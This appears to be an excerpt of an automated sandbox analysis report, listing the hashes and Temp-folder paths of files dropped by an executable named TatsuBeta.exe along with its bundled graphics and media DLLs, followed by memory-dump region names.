MD5 a7ffba19deb7e83889fb2e88035d67e7
SHA1 6bb4bae261e12f7d9c3b84d1eabe0bb4e0b838b3
SHA256 e32c37b52b89edeeaa98ed8edf099b25cdfb31d397d2e3cc5f3b5b4463efd9a3
SHA512 a46f6daac0e6c544667349ac991330c15af18186de3982bffd2c374bdee37f563696fa3fdefb710c325be28c8bcde41bc75643119b148384ca953ebb7faff0a5

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 187d0157113e8a2341f69417e779ff54
SHA1 c97bef312a7546c65aec5cbf0bdc86378dda18c7
SHA256 01f420dee5f290c7c9f26a88c20cabf6c60fff8eddc7fb9c004dfad7b5b3fbd4
SHA512 38d79fea91839ccfee7e964d0c254933e90162c86dce9c828e5388fbda644e8ddb005922d34121dafbb1faab8b6afb2968d7c6accbb2c35b9f4dcf0de417067b

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 6913b3372d96696f5ebcaa62254676f6
SHA1 45449110fa9244e03d24f550796ac4e3a1a4755e
SHA256 2af16987a7cacf5727c23c0f2a52f50a36625427410b5f2258cac37828290a25
SHA512 adc6e8f7b5abd0ead2c34722addb62752f9dabc57c18f0007929f2ffc450b05353b1b749ac9b92e16d0153a912458bafe3a0f7902a375d9b67cce4b795565df8

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 09137894c0806e0a889ede68b6b2aac9
SHA1 7c03d0df43696097bd91af2ea96c05ceb7dbadc5
SHA256 387ffbedbd60a0a4dfbcd54309f02fe901b3c808d60433877008b470b82f1801
SHA512 6f0e18850c773260899451c1a06670e0edd7300a372ad4295700eb3fd0e43443df8f705ffd2265b4561df719d9db482361a953a6dacc7e8c18898496e4361a7c

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 d8ba5dcc6bce9dda93e02ee36d0c2229
SHA1 3b81ab9489bd6991d9aff1f5331687c378acd58f
SHA256 ba35883c8d6f695c5cefa570463baad380839b2efbcd672335c4ee6f61176fae
SHA512 d0ecc7e26b31a01b53aa398dcaa9e8496ab3b09bb8b736677f610d1d52d2c3983258326550c4365e9b3ab32a8771b4db31b20b38f14546d9fd23f862256c2264

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 05236558845e37b632d7fe3b8ea37fc3
SHA1 8ec6ae33364fe1312a881e8fddcaa45ecfb03515
SHA256 28222f40b7d1d3a78db8b56164abd99dcb98dd780782751dc2e646022c0ddfd3
SHA512 1c3b05d495afee0daa5956539274cbf117e84d97a13c1862acb3b785b3deabcf32f2b61dfd05f93b10b552f38c35d3aabe7611487a237b2db27d048f996f1045

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 c93babe02c5f9324f9cc5120b1521378
SHA1 15acc836a7502cf9b76fd4ee9292c032f225aa28
SHA256 8a1c7327d9b6b05f431a2cd7d3a89fa21510b25614a8b7610936fa32bd9aefba
SHA512 879b5047d48d6e95edfb7e952a4e401e7cd67a4a098c81eb83cc0526012ab47cc4cb4ae582b1f201d030702d96bf698f1344ca7e27eaf95b5dd65c908d639ff1

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 5f50d383ebd4dfc5708445f02bcf0413
SHA1 ab085e6addba18b97422d4d58a4a5d35cee05554
SHA256 984c3e8139986d22888803d4f8445c56017c344428a0c888da750534167eb179
SHA512 3034d1a3473c53db1d3446594068b6882679d4dab53e4460b86c55a3bed0df59aaaad5cefbf957501d0c00299311dd5dece63b42d157fe241c4583cd2ce2f418

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 8ce82300e907b0127165b70d8e8a094f
SHA1 5075e2e53af50bf0b91ef899abffb405d95d48f3
SHA256 d5440b4ff3201193e8167dcd8ec4ca462d446eef1efaf12fc2ee9319c87b45a3
SHA512 3d849215f73b4cb43751c74aee472b8a78b8715fcae712f21d0898489a70cc8605a51b525013d582e3f39c197eae4730a0d4daaf9b931a1b881843454e2244f9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 ff759bc2ddf4606f475f6042db0ce54c
SHA1 4b864f2b6f3ff1ae2dd2d3fce4b51be216d895b5
SHA256 09f1491e72b38d60589616e2cd4a9ff736c30101d76cf64e247b0cf113357f66
SHA512 732792b0729ed1564f70c724fdd9d63c9cca14e4df23bf1a40c83f4f1a50ad289172443887974556e268bb5c01676bdbdd0907f3b02ecd5505f6518e647e7096

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 30049cfaccd1cd28ae462bc3ad2b729c
SHA1 838cf59660e641511a663d57c896959daef01099
SHA256 09486b1f07d2a9dfea994b3a92c58a748595aa73b54f6d0b98f1c89cbeeca550
SHA512 58615ff819a033e572f8eef76672a31c7a4f89649cc74694a7da5838bcddd04ede2383df373821a30a406bf94304f48f07ca85a2cb0273b3404b7d089459f295

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 e6310906df22df6b31a4928ebc704940
SHA1 0546ce7860681c8fac17592df42f1a823f5b3ca7
SHA256 a964361977ef1774929e36dcdb29ce247c2a0d46b5f7302dbe17bb94703735cf
SHA512 b61f2ef942d03cb647b09bed151bde4e018b8e8777b900baff9aad6109116adf8868619867271bc5d383d9e4a5b20d81ce13e948070a1b1c302b0a4a3c852547

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 a6fae73e9e7cc667c56d901834eb6a87
SHA1 d8406d612952da95c50a39ca37ef465e98460b89
SHA256 e3fd12092ec3d99b2a9748331ed29a532914f7b63c0bcaec0727e93bf0018900
SHA512 80ca125b678390774343811701a0b54da46e0da0d4bc933e6bb6184ce4660b4a43ed4692ab64b733b70232cae3c558a21fcb6eabe6ef6f789f678ecafc3553a8

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 ecb7e5477d39fa29c42c0e0b4321a999
SHA1 c1762f2cf04429f43c36063a177eedeb02ce06c7
SHA256 566a7d5d2ab39b7891fa4837e75ace01815a8455de7a8b0fe87fde4e19607c4f
SHA512 0be64b9bc2cb633c0d33188702efaa1b1d1f32e7e23122df6d37ec4f6c7c8a67861b73edecad55de84125a457fcf77f6a18aa041ac79309440418c28b8fbd9bc

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vulkan-1.dll

MD5 a37e8e6759fe94a1768affb3cd73a282
SHA1 66c566e7202caa77bbe8f3e2d270842ea6bd162b
SHA256 aa09f0de07eec2e5d845b60776894405b788fb835765844e2d4e961dd34bc274
SHA512 7d428bbf714d4a7821c9647d8c219bc29248e43a244abab6474e6fb4211c3ce23f11f0fdbac14c9cc50b00a94d5f2e78805475e2e816eb11cfa17a77e7c05d57

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 67836ccded61ee1cf9ddca752f078356
SHA1 dc081b0acf622e95647af6cae0d9382abd374e2f
SHA256 f0a958761796782bddeedecc75ecc92a336a5ff2ba6571bb2da9c7cd06e75850
SHA512 9c0aab3f40979a4337a7be928051f06cfa675f1b96e096f9d4c940f291fad9f0f249c95f28ae3d1917efa93c65ccc3cb46a8fd6eaf7ef228cf14de246118e3c7

memory/2496-698-0x000000001B350000-0x000000001B632000-memory.dmp

memory/2496-699-0x0000000002660000-0x0000000002668000-memory.dmp

memory/2496-700-0x000007FEF3250000-0x000007FEF3BED000-memory.dmp

memory/2496-702-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-703-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-704-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-701-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-705-0x000007FEF3250000-0x000007FEF3BED000-memory.dmp

memory/2496-706-0x000007FEF3250000-0x000007FEF3BED000-memory.dmp

memory/2496-708-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-709-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-710-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2496-707-0x0000000002910000-0x0000000002990000-memory.dmp